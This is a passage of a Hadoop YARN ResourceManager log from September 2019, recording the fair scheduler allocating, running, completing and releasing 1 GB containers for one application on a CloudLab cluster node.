2019-09-23 15:21:04,687 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0001_01_000013 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 9 containers, <memory:10240, vCores:9> used and <memory:55296, vCores:23> available after allocation
2019-09-23 15:21:04,697 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000014 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:21:04,697 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000014
2019-09-23 15:21:04,697 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0001_01_000014 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 10 containers, <memory:11264, vCores:10> used and <memory:54272, vCores:22> available after allocation
2019-09-23 15:21:05,638 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000013 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:21:05,639 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000014 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:21:05,700 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000013 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:21:05,701 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000014 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:21:05,702 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000006 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:21:05,702 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0001_01_000006 in state: COMPLETED event:FINISHED
2019-09-23 15:21:05,702 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000006
2019-09-23 15:21:05,703 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0001_01_000006 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 9 containers, <memory:10240, vCores:9> used and <memory:55296, vCores:23> available, release resources=true
2019-09-23 15:21:05,703 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0001_000001 released container container_1569273478927_0001_01_000006 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=9 available=<memory:55296, vCores:23> used=<memory:10240, vCores:9> with event: FINISHED
2019-09-23 15:21:05,705 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000007 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:21:05,705 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0001_01_000007 in state: COMPLETED event:FINISHED
2019-09-23 15:21:05,705 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000007
2019-09-23 15:21:05,705 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0001_01_000007 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 8 containers, <memory:9216, vCores:8> used and <memory:56320, vCores:24> available, release resources=true
2019-09-23 15:21:05,706 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0001_000001 released container container_1569273478927_0001_01_000007 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=8 available=<memory:56320, vCores:24> used=<memory:9216, vCores:8> with event: FINISHED
2019-09-23 15:21:05,707 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000015 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:21:05,707 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000015
2019-09-23 15:21:05,707 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0001_01_000015 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 9 containers, <memory:10240, vCores:9> used and <memory:55296, vCores:23> available after allocation
2019-09-23 15:21:05,977 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000016 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:21:05,978 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000016
2019-09-23 15:21:05,978 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0001_01_000016 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 10 containers, <memory:11264, vCores:10> used and <memory:54272, vCores:22> available after allocation
2019-09-23 15:21:06,647 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000015 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:21:06,649 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000016 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:21:06,980 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000015 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:21:06,980 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000016 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:21:06,981 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000009 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:21:06,981 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0001_01_000009 in state: COMPLETED event:FINISHED
2019-09-23 15:21:06,981 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000009
2019-09-23 15:21:06,981 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0001_01_000009 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 9 containers, <memory:10240, vCores:9> used and <memory:55296, vCores:23> available, release resources=true
2019-09-23 15:21:06,981 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0001_000001 released container container_1569273478927_0001_01_000009 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=9 available=<memory:55296, vCores:23> used=<memory:10240, vCores:9> with event: FINISHED
2019-09-23 15:21:06,982 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000017 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:21:06,983 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000017
2019-09-23 15:21:06,983 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0001_01_000017 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 10 containers, <memory:11264, vCores:10> used and <memory:54272, vCores:22> available after allocation
2019-09-23 15:21:07,173 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000018 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:21:07,174 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000018
2019-09-23 15:21:07,174 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0001_01_000018 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 11 containers, <memory:12288, vCores:11> used and <memory:53248, vCores:21> available after allocation
2019-09-23 15:21:07,225 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000019 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:21:07,225 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000019
2019-09-23 15:21:07,226 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0001_01_000019 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 12 containers, <memory:13312, vCores:12> used and <memory:52224, vCores:20> available after allocation
2019-09-23 15:21:07,658 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000017 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:21:07,661 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000018 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:21:07,662 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000019 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:21:08,229 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000017 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:21:08,230 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000018 Container Transitioned from ACQUIRED to RUNNING
2019-09-23 15:21:08,231 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000010 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:21:08,231 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0001_01_000010 in state: COMPLETED event:FINISHED
2019-09-23 15:21:08,232 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000010
2019-09-23 15:21:08,232 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0001_01_000010 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 11 containers, <memory:12288, vCores:11> used and <memory:53248, vCores:21> available, release resources=true
2019-09-23 15:21:08,232 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0001_000001 released container container_1569273478927_0001_01_000010 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=11 available=<memory:53248, vCores:21> used=<memory:12288, vCores:11> with event: FINISHED
2019-09-23 15:21:08,233 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000011 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:21:08,233 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0001_01_000011 in state: COMPLETED event:FINISHED
2019-09-23 15:21:08,233 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000011
2019-09-23 15:21:08,233 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0001_01_000011 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 10 containers, <memory:11264, vCores:10> used and <memory:54272, vCores:22> available, release resources=true
2019-09-23 15:21:08,233 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0001_000001 released container container_1569273478927_0001_01_000011 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=10 available=<memory:54272, vCores:22> used=<memory:11264, vCores:10> with event: FINISHED
2019-09-23 15:21:08,235 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000020 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:21:08,236 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000020
2019-09-23 15:21:08,236 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0001_01_000020 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 11 containers, <memory:12288, vCores:11> used and <memory:53248, vCores:21> available after allocation
2019-09-23 15:21:08,386 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000021 Container Transitioned from NEW to ALLOCATED
2019-09-23 15:21:08,386 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Allocated Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000021
2019-09-23 15:21:08,386 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Assigned container container_1569273478927_0001_01_000021 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which has 12 containers, <memory:13312, vCores:12> used and <memory:52224, vCores:20> available after allocation
2019-09-23 15:21:08,671 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000019 Container Transitioned from ACQUIRED to RELEASED
2019-09-23 15:21:08,672 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0001_01_000019 in state: RELEASED event:RELEASED
2019-09-23 15:21:08,672 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	IP=128.110.153.76	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000019
2019-09-23 15:21:08,673 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0001_01_000019 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 11 containers, <memory:12288, vCores:11> used and <memory:53248, vCores:21> available, release resources=true
2019-09-23 15:21:08,673 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0001_000001 released container container_1569273478927_0001_01_000019 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=11 available=<memory:53248, vCores:21> used=<memory:12288, vCores:11> with event: RELEASED
2019-09-23 15:21:08,673 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.AppSchedulingInfo: checking for deactivate of application :application_1569273478927_0001
2019-09-23 15:21:08,676 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000020 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:21:08,678 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000021 Container Transitioned from ALLOCATED to ACQUIRED
2019-09-23 15:21:09,299 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000012 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:21:09,299 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0001_01_000012 in state: COMPLETED event:FINISHED
2019-09-23 15:21:09,299 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000012
2019-09-23 15:21:09,299 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0001_01_000012 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 10 containers, <memory:11264, vCores:10> used and <memory:54272, vCores:22> available, release resources=true
2019-09-23 15:21:09,299 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0001_000001 released container container_1569273478927_0001_01_000012 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=10 available=<memory:54272, vCores:22> used=<memory:11264, vCores:10> with event: FINISHED
2019-09-23 15:21:09,684 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000020 Container Transitioned from ACQUIRED to RELEASED
2019-09-23 15:21:09,685 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0001_01_000020 in state: RELEASED event:RELEASED
2019-09-23 15:21:09,685 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	IP=128.110.153.76	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000020
2019-09-23 15:21:09,685 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0001_01_000020 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 9 containers, <memory:10240, vCores:9> used and <memory:55296, vCores:23> available, release resources=true
2019-09-23 15:21:09,685 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0001_000001 released container container_1569273478927_0001_01_000020 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=9 available=<memory:55296, vCores:23> used=<memory:10240, vCores:9> with event: RELEASED
2019-09-23 15:21:09,685 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000021 Container Transitioned from ACQUIRED to RELEASED
2019-09-23 15:21:09,685 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0001_01_000021 in state: RELEASED event:RELEASED
2019-09-23 15:21:09,686 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	IP=128.110.153.76	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000021
2019-09-23 15:21:09,687 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0001_01_000021 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 8 containers, <memory:9216, vCores:8> used and <memory:56320, vCores:24> available, release resources=true
2019-09-23 15:21:09,687 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0001_000001 released container container_1569273478927_0001_01_000021 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=8 available=<memory:56320, vCores:24> used=<memory:9216, vCores:8> with event: RELEASED
2019-09-23 15:21:10,162 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000014 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:21:10,163 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0001_01_000014 in state: COMPLETED event:FINISHED
2019-09-23 15:21:10,163 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000014
2019-09-23 15:21:10,163 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0001_01_000014 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 7 containers, <memory:8192, vCores:7> used and <memory:57344, vCores:25> available, release resources=true
2019-09-23 15:21:10,163 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0001_000001 released container container_1569273478927_0001_01_000014 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=7 available=<memory:57344, vCores:25> used=<memory:8192, vCores:7> with event: FINISHED
2019-09-23 15:21:10,164 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000013 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:21:10,164 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0001_01_000013 in state: COMPLETED event:FINISHED
2019-09-23 15:21:10,164 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000013
2019-09-23 15:21:10,164 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0001_01_000013 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 6 containers, <memory:7168, vCores:6> used and <memory:58368, vCores:26> available, release resources=true
2019-09-23 15:21:10,164 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0001_000001 released container container_1569273478927_0001_01_000013 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=6 available=<memory:58368, vCores:26> used=<memory:7168, vCores:6> with event: FINISHED
2019-09-23 15:21:10,201 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000015 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:21:10,201 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0001_01_000015 in state: COMPLETED event:FINISHED
2019-09-23 15:21:10,201 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000015
2019-09-23 15:21:10,201 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0001_01_000015 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 5 containers, <memory:6144, vCores:5> used and <memory:59392, vCores:27> available, release resources=true
2019-09-23 15:21:10,201 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0001_000001 released container container_1569273478927_0001_01_000015 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=5 available=<memory:59392, vCores:27> used=<memory:6144, vCores:5> with event: FINISHED
2019-09-23 15:21:10,997 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000016 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:21:10,997 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0001_01_000016 in state: COMPLETED event:FINISHED
2019-09-23 15:21:10,997 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000016
2019-09-23 15:21:10,997 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0001_01_000016 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 4 containers, <memory:5120, vCores:4> used and <memory:60416, vCores:28> available, release resources=true
2019-09-23 15:21:10,997 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0001_000001 released container container_1569273478927_0001_01_000016 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=4 available=<memory:60416, vCores:28> used=<memory:5120, vCores:4> with event: FINISHED
2019-09-23 15:21:11,056 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000017 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:21:11,056 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0001_01_000017 in state: COMPLETED event:FINISHED
2019-09-23 15:21:11,056 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000017
2019-09-23 15:21:11,057 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.SchedulerNode: Released container container_1569273478927_0001_01_000017 of capacity <memory:1024, vCores:1> on host cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315, which currently has 3 containers, <memory:4096, vCores:3> used and <memory:61440, vCores:29> available, release resources=true
2019-09-23 15:21:11,057 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FairScheduler: Application attempt appattempt_1569273478927_0001_000001 released container container_1569273478927_0001_01_000017 on node: host: cp-1.hwcluster.ams560-sbu-pg0.utah.cloudlab.us:40315 #containers=3 available=<memory:61440, vCores:29> used=<memory:4096, vCores:3> with event: FINISHED
2019-09-23 15:21:12,059 INFO org.apache.hadoop.yarn.server.resourcemanager.rmcontainer.RMContainerImpl: container_1569273478927_0001_01_000018 Container Transitioned from RUNNING to COMPLETED
2019-09-23 15:21:12,059 INFO org.apache.hadoop.yarn.server.resourcemanager.scheduler.fair.FSAppAttempt: Completed container: container_1569273478927_0001_01_000018 in state: COMPLETED event:FINISHED
2019-09-23 15:21:12,059 INFO org.apache.hadoop.yarn.server.resourcemanager.RMAuditLogger: USER=F19_TIP	OPERATION=AM Released Container	TARGET=SchedulerApp	RESULT=SUCCESS	APPID=application_1569273478927_0001	CONTAINERID=container_1569273478927_0001_01_000018
